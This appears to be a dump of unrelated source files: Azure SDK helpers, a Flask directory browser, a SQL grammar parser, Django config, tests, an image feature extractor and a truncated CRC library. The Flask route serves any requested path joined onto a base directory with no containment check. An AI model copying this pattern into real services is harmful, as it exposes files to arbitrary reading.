def get_authentication_policy(credential):
authentication_policy = None
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
if isinstance(credential, AzureKeyCredential):
authentication_policy = AzureKeyCredentialPolicy(
name=COGNITIVE_KEY_HEADER, credential=credential
)
elif credential is not None and not hasattr(credential, "get_token"):
raise TypeError("Unsupported credential: {}. Use an instance of AzureKeyCredential "
"or a token credential from azure.identity".format(type(credential)))
return authentication_policy
def get_content_type(form):
"""Source: https://en.wikipedia.org/wiki/Magic_number_(programming)#Magic_numbers_in_files
"""
if isinstance(form, six.binary_type):
return check_beginning_bytes(form)
if hasattr(form, "read") and hasattr(form, "seek"):
beginning_bytes = form.read(4)
form.seek(0)
return check_beginning_bytes(beginning_bytes)
raise ValueError("Content type could not be auto-detected because the stream was not readable/seekable. "
"Please pass the content_type keyword argument.")
def check_beginning_bytes(form):
if len(form) > 3:
if form[:4] == b"\x25\x50\x44\x46":
return "application/pdf"
if form[:2] == b"\xff\xd8":
return "image/jpeg"
if form[:4] == b"\x89\x50\x4E\x47":
return "image/png"
if form[:4] == b"\x49\x49\x2A\x00": # little-endian
return "image/tiff"
if form[:4] == b"\x4D\x4D\x00\x2A": # big-endian
return "image/tiff"
raise ValueError("Content type could not be auto-detected. Please pass the content_type keyword argument.")
class TransportWrapper(HttpTransport):
"""Wrapper class that ensures that an inner client created
by a `get_client` method does not close the outer transport for the parent
when used in a context manager.
"""
def __init__(self, transport):
self._transport = transport
def send(self, request, **kwargs):
return self._transport.send(request, **kwargs)
def open(self):
pass
def close(self):
pass
def __enter__(self):
pass
def __exit__(self, *args): # pylint: disable=arguments-differ
pass

flaskFlieBrow/app2.py | shivampip/FrontEnd | MIT | 563 bytes | Python

# Imports and app object assumed by the route below (a minimal sketch; the
# stored snippet begins at the route decorator).
import os
from flask import Flask, abort, render_template, send_file

app = Flask(__name__)

@app.route('/', defaults={'req_path': ''})
@app.route('/<path:req_path>')
def dir_listing(req_path):
BASE_DIR = '/Users/vivek/Desktop'
# Joining the base and the requested path
abs_path = os.path.join(BASE_DIR, req_path)
# Return 404 if path doesn't exist
if not os.path.exists(abs_path):
return abort(404)
# Check if path is a file and serve
if os.path.isfile(abs_path):
return send_file(abs_path)
# Show directory contents
files = os.listdir(abs_path)
    return render_template('files.html', files=files)

src/compiler/parser.py | tsellam/syllabus | MIT | 10,139 bytes | Python | 1 fork

import re
import math
import numpy as np
from ops import *
from parsimonious.grammar import Grammar
from parsimonious.nodes import NodeVisitor
exprgrammar = Grammar(
r"""
expr = biexpr / unexpr / value
biexpr = value ws binaryop ws expr
unexpr = unaryop expr
value = parenval /
number /
boolean /
function /
string /
attr
parenval = "(" ws expr ws ")"
function = fname "(" ws arg_list? ws ")"
arg_list = expr (ws "," ws expr)*
number = ~"\d*\.?\d+"i
string = ~"\'\w*\'"i
attr = ~"\w[\w\d]*"i
fname = ~"\w[\w\d]*"i
boolean = "true" / "false"
compound_op = "UNION" / "union"
binaryop = "+" / "-" / "*" / "/" / "=" / "<>" /
"<=" / ">" / "<" / ">" / "and" / "or"
unaryop = "+" / "-" / "not"
ws = ~"\s*"i
wsp = ~"\s+"i
""")
grammar = Grammar(
r"""
query = select_cores orderby? limit?
select_cores = select_core (compound_op select_core)*
select_core = SELECT wsp select_results from_clause? where_clause? gb_clause?
select_results = select_result (ws "," ws select_result)*
select_result = sel_res_all_star / sel_res_tab_star / sel_res_val / sel_res_col
sel_res_tab_star = name ".*"
sel_res_all_star = "*"
sel_res_val = expr (AS wsp name)?
sel_res_col = col_ref (AS wsp name)
from_clause = FROM join_source
join_source = ws single_source (ws "," ws single_source)*
single_source = source_table / source_subq
source_table = table_name (AS wsp name)?
source_subq = "(" ws query ws ")" (AS ws name)?
where_clause = WHERE wsp expr (AND wsp expr)*
gb_clause = GROUP BY group_clause having_clause?
group_clause = grouping_term (ws "," grouping_term)*
grouping_term = ws expr
having_clause = HAVING expr
orderby = ORDER BY ordering_term (ws "," ordering_term)*
ordering_term = ws expr (ASC/DESC)?
limit = LIMIT wsp expr (OFFSET expr)?
col_ref = (table_name ".")? column_name
expr = btwnexpr / biexpr / unexpr / value
btwnexpr = value BETWEEN wsp value AND wsp value
biexpr = value ws binaryop_no_andor ws expr
unexpr = unaryop expr
value = parenval /
number /
boolean /
function /
col_ref /
string /
attr
parenval = "(" ws expr ws ")"
function = fname "(" ws arg_list? ws ")"
arg_list = expr (ws "," ws expr)*
number = ~"\d*\.?\d+"i
string = ~"([\"\'])(\\\\?.)*?\\1"i
attr = ~"\w[\w\d]*"i
fname = ~"\w[\w\d]*"i
boolean = "true" / "false"
compound_op = "UNION" / "union"
binaryop = "+" / "-" / "*" / "/" / "=" / "<>" /
"<=" / ">" / "<" / ">" / "and" / "AND" / "or" / "OR"
binaryop_no_andor = "+" / "-" / "*" / "/" / "=" / "<>" /
"<=" / ">" / "<" / ">"
unaryop = "+" / "-" / "not"
ws = ~"\s*"i
wsp = ~"\s+"i
name = ~"[a-zA-Z]\w*"i
table_name = name
column_name = name
ADD = wsp "ADD"
ALL = wsp "ALL"
ALTER = wsp "ALTER"
AND = wsp ("AND" / "and")
AS = wsp ("AS" / "as")
ASC = wsp "ASC"
BETWEEN = wsp ("BETWEEN" / "between")
BY = wsp "BY"
CAST = wsp "CAST"
COLUMN = wsp "COLUMN"
DESC = wsp "DESC"
DISTINCT = wsp "DISTINCT"
E = "E"
ESCAPE = wsp "ESCAPE"
EXCEPT = wsp "EXCEPT"
EXISTS = wsp "EXISTS"
EXPLAIN = ws "EXPLAIN"
EVENT = ws "EVENT"
FORALL = wsp "FORALL"
FROM = wsp "FROM"
GLOB = wsp "GLOB"
GROUP = wsp "GROUP"
HAVING = wsp "HAVING"
IN = wsp "IN"
INNER = wsp "INNER"
INSERT = ws "INSERT"
INTERSECT = wsp "INTERSECT"
INTO = wsp "INTO"
IS = wsp "IS"
ISNULL = wsp "ISNULL"
JOIN = wsp "JOIN"
KEY = wsp "KEY"
LEFT = wsp "LEFT"
LIKE = wsp "LIKE"
LIMIT = wsp "LIMIT"
MATCH = wsp "MATCH"
NO = wsp "NO"
NOT = wsp "NOT"
NOTNULL = wsp "NOTNULL"
NULL = wsp "NULL"
OF = wsp "OF"
OFFSET = wsp "OFFSET"
ON = wsp "ON"
OR = wsp "OR"
ORDER = wsp "ORDER"
OUTER = wsp "OUTER"
PRIMARY = wsp "PRIMARY"
QUERY = wsp "QUERY"
RAISE = wsp "RAISE"
REFERENCES = wsp "REFERENCES"
REGEXP = wsp "REGEXP"
RENAME = wsp "RENAME"
REPLACE = ws "REPLACE"
RETURN = wsp "RETURN"
ROW = wsp "ROW"
SAVEPOINT = wsp "SAVEPOINT"
SELECT = ws "SELECT"
SET = wsp "SET"
TABLE = wsp "TABLE"
TEMP = wsp "TEMP"
TEMPORARY = wsp "TEMPORARY"
THEN = wsp "THEN"
TO = wsp "TO"
UNION = wsp "UNION"
USING = wsp "USING"
VALUES = wsp "VALUES"
VIRTUAL = wsp "VIRTUAL"
WITH = wsp "WITH"
WHERE = wsp "WHERE"
"""
)
def flatten(children, sidx, lidx):
ret = [children[sidx]]
rest = children[lidx]
if not isinstance(rest, list): rest = [rest]
ret.extend(filter(bool, rest))
return ret
class Visitor(NodeVisitor):
"""
Each expression of the form
XXX = ....
in the grammar can be handled with a custom function by writing
def visit_XXX(self, node, children):
You can assume the elements in children are the handled
versions of the corresponding child nodes
"""
grammar = grammar
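    # Illustrative sketch (not part of the original file): the rule
    # `number = ~"\d*\.?\d+"i` is handled by visit_number below, which wraps the
    # matched text in a Literal node, and a full statement is parsed into the
    # operator tree with, e.g.:
    #   plan = parse("SELECT a, b FROM t WHERE a > 3")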
def visit_query(self, node, children):
nodes = filter(bool, children[1:])
ret = children[0]
for n in nodes:
n.c = ret
ret = n
return ret
#
# SELECT CLAUSE
#
def visit_select_cores(self, node, children):
l = filter(bool, children[1])
if len(l):
raise Exception("We don't support multiple SELECT cores")
return children[0]
def visit_select_core(self, node, children):
selectc, fromc, wherec, gbc = tuple(children[2:])
nodes = filter(bool, [fromc, wherec, gbc, selectc])
ret = None
for n in nodes:
if not ret:
ret = n
else:
n.c = ret
ret = n
return ret
def visit_select_results(self, node, children):
allexprs = flatten(children, 0, 1)
print allexprs
exprs, aliases = zip(*allexprs)
return Project(None, exprs, aliases)
def visit_sel_res_tab_star(self, node, children):
return (Star(children[0]), None)
def visit_sel_res_all_star(self, node, children):
return (Star(), None)
def visit_sel_res_val(self, node, children):
return (children[0], children[1] or None)
def visit_sel_res_col(self, node, children):
return (children[0], children[1] or None)
#
# FROM CLAUSE
#
def visit_from_clause(self, node, children):
return children[1]
def visit_join_source(self, node, children):
sources = flatten(children, 1, 2)
return From(sources)
def visit_source_table(self, node, children):
tname = children[0]
alias = children[1] or tname
return Scan(tname, alias)
def visit_source_subq(self, node, children):
subq = children[2]
alias = children[5]
return SubQuerySource(subq, alias)
#
# Other clauses
#
def visit_where_clause(self, node, children):
exprs = flatten(children, 2, -1)
ret = exprs[0]
for e in exprs[1:]:
ret = Expr("and", e, ret)
return Filter(None, ret)
def visit_gb_clause(self, node, children):
gb = children[2]
having = children[3]
if having:
having.c = gb
return having
return gb
def visit_group_clause(self, node, children):
groups = flatten(children, 0, 1)
return GroupBy(None, groups)
def visit_grouping_term(self, node, children):
return children[1]
def visit_having_clause(self, node, children):
return children[1]
def visit_orderby(self, node, children):
terms = flatten(children, 2, 3)
exprs, ascdesc = zip(*terms)
return OrderBy(None, exprs, ascdesc)
def visit_ordering_term(self, node, children):
expr = children[1]
order = children[2] or "asc"
return (expr, order)
def visit_limit(self, node, children):
if children[3]:
print "WARN: don't support offset yet"
return Limit(None, children[2])
def visit_col_ref(self, node, children):
return Attr(children[1], children[0])
def visit_name(self, node, children):
return node.text
def visit_attr(self, node, children):
return Attr(node.text)
def visit_binaryop(self, node, children):
return node.text
def visit_binaryop_no_andor(self, node, children):
return node.text
def visit_biexpr(self, node, children):
return Expr(children[2], children[0], children[-1])
def visit_unexpr(self, node, children):
return Expr(children[0], children[1])
def visit_btwnexpr(self, node, children):
v1, v2, v3 = children[0], children[3], children[-1]
def visit_expr(self, node, children):
return children[0]
def visit_function(self, node, children):
fname = children[0]
arglist = children[3]
return Func(fname, arglist)
def visit_fname(self, node, children):
return node.text
def visit_arg_list(self, node, children):
return flatten(children, 0, 1)
def visit_number(self, node, children):
return Literal(float(node.text))
def visit_string(self, node, children):
return Literal(node.text)
def visit_parenval(self, node, children):
return children[2]
def visit_value(self, node, children):
return children[0]
def visit_parenval(self, node, children):
return children[2]
def visit_boolean(self, node, children):
if node.text == "true":
return Literal(True)
return Literal(False)
def generic_visit(self, node, children):
children = filter(lambda v: v and (not isinstance(v, basestring) or v.strip()), children)
if len(children) == 1:
return children[0]
return children
class ExprVisitor(Visitor):
grammar = exprgrammar
def parse(s):
return Visitor().parse(s)
def parseexpr(s):
return ExprVisitor().parse(s)
if __name__ == "__main__":
import click
@click.command()
@click.option("-c", type=str)
def run(c="(a+a) > 3"):
print c
ast = parse(c)
print "printing ast"
print ast
run()
4a2238f98b11015eaf5cb776cdf0edc09d2e691b | 391 | py | Python | quizzes/asgi.py | TheShubhendra/quizzes-backend | 90e161281ec02599b17c6f0a9fdd20bddf25bfe7 | [
"MIT"
] | null | null | null | quizzes/asgi.py | TheShubhendra/quizzes-backend | 90e161281ec02599b17c6f0a9fdd20bddf25bfe7 | [
"MIT"
] | null | null | null | quizzes/asgi.py | TheShubhendra/quizzes-backend | 90e161281ec02599b17c6f0a9fdd20bddf25bfe7 | [
"MIT"
] | null | null | null | """
ASGI config for quizzes project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "quizzes.settings")
application = get_asgi_application()
4a2239408e9639e65017c52bb225820757c22afa | 490 | py | Python | tests/r/test_npk.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | tests/r/test_npk.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | tests/r/test_npk.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.npk import npk
def test_npk():
"""Test module npk.py by downloading
npk.csv and testing shape of
extracted data has 24 rows and 5 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = npk(test_path)
try:
assert x_train.shape == (24, 5)
except:
shutil.rmtree(test_path)
raise()
4a223a944a3e6d66d1e0a33f254a78f60c00f6ec | 1,079 | py | Python | GTApack/GTA_tester.py | marctimjen/Deep_final | ca4de1e04e00706b53c356e1ccc57c7bdfe715f5 | [
"MIT"
] | null | null | null | GTApack/GTA_tester.py | marctimjen/Deep_final | ca4de1e04e00706b53c356e1ccc57c7bdfe715f5 | [
"MIT"
] | null | null | null | GTApack/GTA_tester.py | marctimjen/Deep_final | ca4de1e04e00706b53c356e1ccc57c7bdfe715f5 | [
"MIT"
] | null | null | null | import torch
import numpy as np
def GTA_tester(model, testloader, p = True):
"""
    This function calculates the accuracy of a model (network) given an input
    and target. Note that this tester only works for networks with one-hot
    encoding.
    Args:
        model: The model (network) we want to test the accuracy for.
        testloader (generator): The testloader is a generator object that
            delivers the input and target.
        p (bool): This value tells the function if it should print the progress.
    Returns:
        list: With the means of the pixel-accuracy per image.
"""
count = 0
test_acc_per_pix = []
for img, lab in testloader:
if p:
count += 1
print("test count:", count)
with torch.no_grad():
y_pred = model(img)
for i in range(lab.shape[0]):
test_acc_per_pix.append(np.mean(
(torch.argmax(y_pred[i].cpu().detach(), dim = 0) ==
torch.argmax(lab[i].cpu(), dim = 0)).numpy()))
return test_acc_per_pix
4a223aa466773121ab82dcf320eff6e156a7b619 | 4,771 | py | Python | dojo/importers/utils.py | axelpavageau/django-DefectDojo | 00b425742b783ada0f432241c2812ac1257feb73 | [
"BSD-3-Clause"
] | 1 | 2021-12-14T14:46:42.000Z | 2021-12-14T14:46:42.000Z | dojo/importers/utils.py | axelpavageau/django-DefectDojo | 00b425742b783ada0f432241c2812ac1257feb73 | [
"BSD-3-Clause"
] | 562 | 2019-06-21T18:44:38.000Z | 2022-03-28T18:09:08.000Z | dojo/importers/utils.py | axelpavageau/django-DefectDojo | 00b425742b783ada0f432241c2812ac1257feb73 | [
"BSD-3-Clause"
] | 2 | 2021-09-16T18:30:17.000Z | 2021-09-17T00:46:38.000Z | from dojo.utils import max_safe
from dojo.tools.factory import import_parser_factory
from dojo.models import IMPORT_CLOSED_FINDING, IMPORT_CREATED_FINDING, IMPORT_REACTIVATED_FINDING, Test_Import, Test_Import_Finding_Action
import logging
logger = logging.getLogger(__name__)
def parse_findings(scan, test, active, verified, scan_type):
try:
parser = import_parser_factory(scan,
test,
active,
verified,
scan_type)
parsed_findings = parser.get_findings(scan, test)
return parsed_findings
except SyntaxError as se:
logger.exception(se)
logger.warn("Error in parser: {}".format(str(se)))
raise
except ValueError as ve:
logger.exception(ve)
logger.warn("Error in parser: {}".format(str(ve)))
raise
except Exception as e:
logger.exception(e)
logger.warn("Error in parser: {}".format(str(e)))
raise
def update_timestamps(test, scan_date, version, branch_tag, build_id, commit_hash, now, scan_date_time):
test.engagement.updated = now
if test.engagement.engagement_type == 'CI/CD':
test.engagement.target_end = max_safe([scan_date_time.date(), test.engagement.target_end])
test.updated = now
test.target_end = max_safe([scan_date_time, test.target_end])
if version:
test.version = version
if branch_tag:
test.branch_tag = branch_tag
test.engagement.version = version
if build_id:
test.build_id = build_id
if branch_tag:
test.commit_hash = commit_hash
test.save()
test.engagement.save()
def update_import_history(type, active, verified, tags, minimum_severity, endpoints_to_add, version, branch_tag,
build_id, commit_hash, push_to_jira, close_old_findings, test,
new_findings=[], closed_findings=[], reactivated_findings=[]):
logger.debug("new: %d closed: %d reactivated: %d", len(new_findings), len(closed_findings), len(reactivated_findings))
# json field
import_settings = {}
import_settings['active'] = active
import_settings['verified'] = verified
import_settings['minimum_severity'] = minimum_severity
import_settings['close_old_findings'] = close_old_findings
import_settings['push_to_jira'] = push_to_jira
import_settings['tags'] = tags
# tags=tags TODO no tags field in api for reimport it seems
if endpoints_to_add:
import_settings['endpoints'] = [str(endpoint) for endpoint in endpoints_to_add]
test_import = Test_Import(test=test, import_settings=import_settings, version=version, branch_tag=branch_tag, build_id=build_id, commit_hash=commit_hash, type=type)
test_import.save()
test_import_finding_action_list = []
for finding in closed_findings:
logger.debug('preparing Test_Import_Finding_Action for finding: %i', finding.id)
test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_CLOSED_FINDING))
for finding in new_findings:
logger.debug('preparing Test_Import_Finding_Action for finding: %i', finding.id)
test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_CREATED_FINDING))
for finding in reactivated_findings:
logger.debug('preparing Test_Import_Finding_Action for finding: %i', finding.id)
test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_REACTIVATED_FINDING))
Test_Import_Finding_Action.objects.bulk_create(test_import_finding_action_list)
def construct_imported_message(scan_type, finding_count=0, new_finding_count=0, closed_finding_count=0, reactivated_finding_count=0, untouched_finding_count=0):
if finding_count:
message = f'{scan_type} processed a total of {finding_count} findings'
if new_finding_count:
message = message + ' created %d findings' % (new_finding_count)
if closed_finding_count:
message = message + ' closed %d findings' % (closed_finding_count)
if reactivated_finding_count:
message = message + ' reactivated %d findings' % (reactivated_finding_count)
if untouched_finding_count:
message = message + ' did not touch %d findings' % (untouched_finding_count)
message = message + "."
else:
message = 'No findings were added/updated/closed/reactivated as the findings in Defect Dojo are identical to those in the uploaded report.'
return message
| 43.770642 | 168 | 0.70174 |
4a223b25a4666a8d0945829170ab34b6ba745d1f | 3,405 | py | Python | preprocessing.py | Mamxlam/legumeRecognition | ddf00edecb6f2527134842e2ff7f118747882dde | [
"Apache-2.0"
] | null | null | null | preprocessing.py | Mamxlam/legumeRecognition | ddf00edecb6f2527134842e2ff7f118747882dde | [
"Apache-2.0"
] | null | null | null | preprocessing.py | Mamxlam/legumeRecognition | ddf00edecb6f2527134842e2ff7f118747882dde | [
"Apache-2.0"
] | null | null | null | import numpy as np
import cv2
import glob
from skimage import feature
from sklearn.preprocessing import MinMaxScaler,LabelEncoder
from matplotlib import pyplot as plt
import csv
import pandas as pd
import h5py
def importing_images():
images = []
beans_files = sorted(glob.glob ("beans\\*.jpg"))
chickpeas_files = sorted(glob.glob ("chickpea\\*.jpg"))
hazelnuts_files = sorted(glob.glob ("hazelnut\\*.jpg"))
lentil_files = sorted(glob.glob ("lentil\\*.jpg"))
for myFile in beans_files:
print(myFile)
image = cv2.imread (myFile)
images.append(image)
for myFile in chickpeas_files:
print(myFile)
image = cv2.imread (myFile)
images.append(image)
for myFile in hazelnuts_files:
print(myFile)
image = cv2.imread (myFile)
images.append(image)
for myFile in lentil_files:
print(myFile)
image = cv2.imread (myFile)
images.append(image)
return images
def resize(image):
height = 256
width = 256
dim = (width,height)
res_img = cv2.resize(image,dim,interpolation=cv2.INTER_LINEAR)
return res_img
def lbp_histograms(image,numPoints,radius):
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
lbp = feature.local_binary_pattern(gray, numPoints, radius, method="default")
x, bin_edges = np.histogram(lbp.ravel(), bins=256)
hist = x / sum(x)
return hist
def hu_moments(image):
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # use a distinct local name so the imported skimage `feature` module is not shadowed
    moments = cv2.HuMoments(cv2.moments(gray)).flatten()
    return moments
def color_histogram(image, mask=None):
image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hist = cv2.calcHist([image], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])
cv2.normalize(hist, hist)
return hist.flatten()
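# Note: with the settings used below, the per-image feature vector stacks
# 256 values (LBP histogram) + 7 (Hu moments) + 512 (8x8x8 HSV colour
# histogram) = 775 values before scaling.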
#Starting program
#Initializing feature list
global_features = []
#making target list
y = []
for x in range(50):
y.append("bean")
for x in range(50):
y.append("chickpea")
for x in range(50):
y.append("hazelnut")
for x in range(50):
y.append("lentil")
#y_t = np.array(y).T
images = importing_images()
for x in range(200):
images[x] = resize(images[x])
print("Image ", x , " resized...")
images_for_desc = images
for x in range(200):
current_hist = lbp_histograms(images_for_desc[x],8,2)
current_moment = hu_moments(images_for_desc[x])
current_color = color_histogram(images_for_desc[x])
global_feature = np.hstack([current_hist,current_moment,current_color])
global_features.append(global_feature)
print("Iteration ", x, " / Current image features extracted...")
#Normalizing features by scaling them
print("Normalizing feature vector")
scaler = MinMaxScaler(feature_range=(0,1))
scaled_features = scaler.fit_transform(global_features)
labelEncoder = LabelEncoder()
target = labelEncoder.fit_transform(y)
#y = np.array(y).astype(int)
#Saving in h5 file
print("Saving features and targets...")
h5f_features = h5py.File('data.h5', 'w')
h5f_features.create_dataset('dataset_1', data = np.array(scaled_features))
h5f_targets = h5py.File('labels.h5', 'w')
h5f_targets.create_dataset('dataset_1', data = np.array(target))
h5f_features.close()
h5f_targets.close()
#print(len(images))
#print(len(y_t),y_t)
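# Optional read-back check (a minimal sketch): reload the HDF5 files written
# above to confirm the stored shapes, expected (200, 775) and (200,).
with h5py.File('data.h5', 'r') as f_feat, h5py.File('labels.h5', 'r') as f_lab:
    loaded_features = np.array(f_feat['dataset_1'])
    loaded_labels = np.array(f_lab['dataset_1'])
print("Loaded features shape:", loaded_features.shape)
print("Loaded labels shape:", loaded_labels.shape)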
| 25.795455 | 87 | 0.664611 |
4a223bd3ee9cc6269445fd36f2b8841abb241359 | 27,025 | py | Python | syss_crc.py | quartiq/ai9 | edb406594d1eafe844f6aa3ce9159bef42717d73 | [
"MIT"
] | null | null | null | syss_crc.py | quartiq/ai9 | edb406594d1eafe844f6aa3ce9159bef42717d73 | [
"MIT"
] | null | null | null | syss_crc.py | quartiq/ai9 | edb406594d1eafe844f6aa3ce9159bef42717d73 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
SySS CRC
Simple Python CRC implementation for playing around with cyclic redundancy
checks, for instance when analyzing undocumented protocols or file formats
by Matthias Deeg <[email protected]>
inspired by Online CRC Calculator by Anton Isakov (https://crccalc.com/)
and Sunshine2k's CRC Calculator by Bastian Molkenthin
(http://www.sunshine2k.de/coding/javascript/crc/crc_js.html)
MIT License
Copyright (c) 2018, 2019 SySS GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__version__ = '0.3'
__author__ = 'Matthias Deeg'
# look-up table for faster bit order reversing
REVERSE_BITS_LUT = [
0x00, 0x80, 0x40, 0xC0, 0x20, 0xA0, 0x60, 0xE0, 0x10, 0x90, 0x50, 0xD0, 0x30, 0xB0, 0x70, 0xF0,
0x08, 0x88, 0x48, 0xC8, 0x28, 0xA8, 0x68, 0xE8, 0x18, 0x98, 0x58, 0xD8, 0x38, 0xB8, 0x78, 0xF8,
0x04, 0x84, 0x44, 0xC4, 0x24, 0xA4, 0x64, 0xE4, 0x14, 0x94, 0x54, 0xD4, 0x34, 0xB4, 0x74, 0xF4,
0x0C, 0x8C, 0x4C, 0xCC, 0x2C, 0xAC, 0x6C, 0xEC, 0x1C, 0x9C, 0x5C, 0xDC, 0x3C, 0xBC, 0x7C, 0xFC,
0x02, 0x82, 0x42, 0xC2, 0x22, 0xA2, 0x62, 0xE2, 0x12, 0x92, 0x52, 0xD2, 0x32, 0xB2, 0x72, 0xF2,
0x0A, 0x8A, 0x4A, 0xCA, 0x2A, 0xAA, 0x6A, 0xEA, 0x1A, 0x9A, 0x5A, 0xDA, 0x3A, 0xBA, 0x7A, 0xFA,
0x06, 0x86, 0x46, 0xC6, 0x26, 0xA6, 0x66, 0xE6, 0x16, 0x96, 0x56, 0xD6, 0x36, 0xB6, 0x76, 0xF6,
0x0E, 0x8E, 0x4E, 0xCE, 0x2E, 0xAE, 0x6E, 0xEE, 0x1E, 0x9E, 0x5E, 0xDE, 0x3E, 0xBE, 0x7E, 0xFE,
0x01, 0x81, 0x41, 0xC1, 0x21, 0xA1, 0x61, 0xE1, 0x11, 0x91, 0x51, 0xD1, 0x31, 0xB1, 0x71, 0xF1,
0x09, 0x89, 0x49, 0xC9, 0x29, 0xA9, 0x69, 0xE9, 0x19, 0x99, 0x59, 0xD9, 0x39, 0xB9, 0x79, 0xF9,
0x05, 0x85, 0x45, 0xC5, 0x25, 0xA5, 0x65, 0xE5, 0x15, 0x95, 0x55, 0xD5, 0x35, 0xB5, 0x75, 0xF5,
0x0D, 0x8D, 0x4D, 0xCD, 0x2D, 0xAD, 0x6D, 0xED, 0x1D, 0x9D, 0x5D, 0xDD, 0x3D, 0xBD, 0x7D, 0xFD,
0x03, 0x83, 0x43, 0xC3, 0x23, 0xA3, 0x63, 0xE3, 0x13, 0x93, 0x53, 0xD3, 0x33, 0xB3, 0x73, 0xF3,
0x0B, 0x8B, 0x4B, 0xCB, 0x2B, 0xAB, 0x6B, 0xEB, 0x1B, 0x9B, 0x5B, 0xDB, 0x3B, 0xBB, 0x7B, 0xFB,
0x07, 0x87, 0x47, 0xC7, 0x27, 0xA7, 0x67, 0xE7, 0x17, 0x97, 0x57, 0xD7, 0x37, 0xB7, 0x77, 0xF7,
0x0F, 0x8F, 0x4F, 0xCF, 0x2F, 0xAF, 0x6F, 0xEF, 0x1F, 0x9F, 0x5F, 0xDF, 0x3F, 0xBF, 0x7F, 0xFF,
]
def reverse_bits(n, width=8):
"""Reverse bit order (not the fastest way)"""
b = '{:0{width}b}'.format(n, width=width)
return int(b[::-1], 2)
def reverse_bits_byte(n):
"""Reverse bit order of bytes (8 bit values) using a look-up table"""
return REVERSE_BITS_LUT[n]
def reverse_bits_word(n):
"""Reverse bit order of words (16 bit values) using a look-up table"""
return (REVERSE_BITS_LUT[(n >> 8) & 0xff] |
REVERSE_BITS_LUT[n & 0xff] << 8)
def reverse_bits_dword(n):
"""Reverse bit order of dwords (32 bit values) using a look-up table"""
return (REVERSE_BITS_LUT[(n >> 24) & 0xff] |
REVERSE_BITS_LUT[(n >> 16) & 0xff] << 8 |
REVERSE_BITS_LUT[(n >> 8) & 0xff] << 16 |
REVERSE_BITS_LUT[n & 0xff] << 24)
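# Example: reverse_bits(0b11010000) == reverse_bits_byte(0xD0) == 0x0B,
# i.e. the bit pattern 1101 0000 read backwards is 0000 1011.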
class CRC():
"""Simple CRC calculator"""
# input string for CRC check
CHECK_DATA = b'123456789'
# some well-known CRC configurations
CRC_CONFIG = {
# 8 bit
'CRC-8': {'width': 8, 'poly': 0x07, 'init': 0x00, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0xF4},
'CRC-8/CDMA2000': {'width': 8, 'poly': 0x9B, 'init': 0xFF, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0xDA},
'CRC-8/DARC': {'width': 8, 'poly': 0x39, 'init': 0x00, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0x15},
'CRC-8/DVB-S2': {'width': 8, 'poly': 0xD5, 'init': 0x00, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0xBC},
'CRC-8/EBU': {'width': 8, 'poly': 0x1D, 'init': 0xFF, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0x97},
'CRC-8/I-CODE': {'width': 8, 'poly': 0x1D, 'init': 0xFD, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0x7E},
'CRC-8/ITU': {'width': 8, 'poly': 0x07, 'init': 0x00, 'refin': False, 'refout': False, 'xorout': 0x55, 'check': 0xA1},
'CRC-8/MAXIM': {'width': 8, 'poly': 0x31, 'init': 0x00, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0xA1},
'CRC-8/ROHC': {'width': 8, 'poly': 0x07, 'init': 0xFF, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0xD0},
'CRC-8/WCDMA': {'width': 8, 'poly': 0x9B, 'init': 0x00, 'refin': True, 'refout': True, 'xorout': 0x00, 'check': 0x25},
# 16 bit
'CRC-16/CCITT-FALSE': {'width': 16, 'poly': 0x1021, 'init': 0xFFFF, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x29B1},
